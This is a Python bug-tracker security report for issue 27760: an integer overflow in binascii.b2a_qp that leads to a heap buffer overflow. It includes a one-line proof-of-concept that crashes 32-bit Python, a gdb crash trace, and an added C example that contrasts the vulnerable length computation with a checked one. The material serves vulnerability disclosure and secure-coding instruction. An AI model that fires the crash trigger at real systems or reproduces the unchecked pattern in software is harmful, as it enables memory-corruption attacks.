[New-bugs-announce] [issue27760] integer overflow in binascii.b2a_qp
Benjamin Peterson
report at bugs.python.org
Sat Aug 13 21:32:26 EDT 2016
New submission from Benjamin Peterson:
Thomas E Hybel reports:
This vulnerability resides in /Modules/binascii.c in the function
binascii_b2a_qp_impl. The problem is that the integer variable "odatalen" can
overflow to become a small number.
The function binascii_b2a_qp_impl qp-encodes binary data. First it computes the
output string's length in the variable "odatalen":
    /* First, scan to see how many characters need to be encoded */
    in = 0;
    while (in < datalen) {
        if ((databuf[in] > 126) || ... )
        {
            ...
            odatalen += 3;
            in++;
        }
        ...
    }
As we can see, each input character can result in more than three
output characters. Then we allocate the output string:
odata = (unsigned char *) PyMem_Malloc(odatalen);
And finally we encode the input string and write the result into odata.
If our string is so large that "odatalen" will wrap around and become a small
number, then the odata buffer will be too small to hold the data. Our input is
then copied into this too-small buffer. So the integer overflow results in a
heap buffer overflow.
Here's a proof-of-concept script:
--- begin script ---
import binascii
binascii.b2a_qp(b"\x80"*0x531dec0e) # this number gives odatalen=2
--- end script ---
Note that this script assumes a 32-bit system where the "odatalen" variable will
be 4 bytes wide. When run on Python-3.5.2, 32-bits, we get a segfault:
(gdb) r ../poc3.py
Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.py
Breakpoint 1, binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,
    data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1448
1448        odata = (unsigned char *) PyMem_Malloc(odatalen);
(gdb) p odatalen
$27 = 0x2
(gdb) p datalen
$28 = 0x531dec0e
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
1333        s[1] = "0123456789ABCDEF"[uvalue % 16];
(gdb) bt
#0  0xb7fd1f63 in to_hex (ch=0x80, s=s@entry=0x83c5fff "")
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
#1  0xb7fd22fa in binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,
    data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476
#2  0xb7fd2510 in binascii_b2a_qp (module=module@entry=0xb7c370f4,
    args=args@entry=0xb7cbbb5c, kwargs=kwargs@entry=0x0)
    at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510
#3  0x080e0ef4 in PyCFunction_Call (func=func@entry=0xb7c37534,
    args=args@entry=0xb7cbbb5c, kwds=kwds@entry=0x0)
    at Objects/methodobject.c:98
----------
components: Library (Lib)
messages: 272634
nosy: benjamin.peterson
priority: normal
severity: normal
status: open
title: integer overflow in binascii.b2a_qp
type: security
versions: Python 2.7, Python 3.2, Python 3.3, Python 3.4, Python 3.5, Python 3.6
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue27760>
_______________________________________
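An added example (not CPython's code and not the fix that landed for this issue) showing the length-counting pass from the report as an unchecked 32-bit accumulation beside a checked version that refuses to wrap, plus a closed form that reproduces the reporter's odatalen of 2 for the PoC input size. The encoding rule is a simplification of b2a_qp and is an assumption here: a byte above 126 or '=' costs three output bytes, anything else one, and a two-byte soft break is inserted when a line would reach 76 columns.

```c
/* Added example, not CPython's code: the QP length pass with an overflow
 * check, beside the unchecked 32-bit accumulation it replaces. Encoding
 * rule (assumption, simplified from b2a_qp): byte > 126 or '=' costs 3
 * output bytes, anything else 1; a 2-byte soft break "=\n" is inserted
 * when a line would reach 76 columns. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#define MAXLINESIZE 76

/* Output bytes for one input byte, including any soft break it triggers;
 * *linelen is the current output column, as in the real scanner. */
static size_t qp_cost(unsigned char c, size_t *linelen) {
    size_t need = (c > 126 || c == '=') ? 3 : 1, extra = 0;
    if (*linelen + need >= MAXLINESIZE) { *linelen = 0; extra = 2; }
    *linelen += need;
    return need + extra;
}

/* Vulnerable pattern: a fixed-width accumulator (32 bits, as on a 32-bit
 * build) that is never compared with its maximum, so it silently wraps. */
uint32_t qp_len_unchecked32(const unsigned char *buf, size_t n) {
    uint32_t odatalen = 0;
    size_t linelen = 0;
    for (size_t in = 0; in < n; in++)
        odatalen += (uint32_t)qp_cost(buf[in], &linelen);  /* may wrap */
    return odatalen;
}

/* Hardened pattern: reject before an addition would exceed 'limit' (the
 * accumulator's maximum) instead of passing a wrapped size to malloc. */
bool qp_len_checked(const unsigned char *buf, size_t n, size_t limit,
                    size_t *out) {
    size_t odatalen = 0, linelen = 0;
    for (size_t in = 0; in < n; in++) {
        size_t cost = qp_cost(buf[in], &linelen);
        if (cost > limit - odatalen)   /* odatalen <= limit always holds */
            return false;
        odatalen += cost;
    }
    *out = odatalen;
    return true;
}

/* Closed form of the same pass for n copies of one byte > 126, so the PoC
 * count can be checked without a buffer of over a gigabyte. */
uint32_t qp_len_high_bytes_wrapped32(uint64_t n) {
    uint64_t total = 3 * n + (n ? 2 * ((n - 1) / 25) : 0);
    return (uint32_t)total;   /* truncation == the 32-bit wrap */
}
```

With the PoC's datalen of 0x531dec0e the closed form yields 2, matching the value printed in the gdb session above.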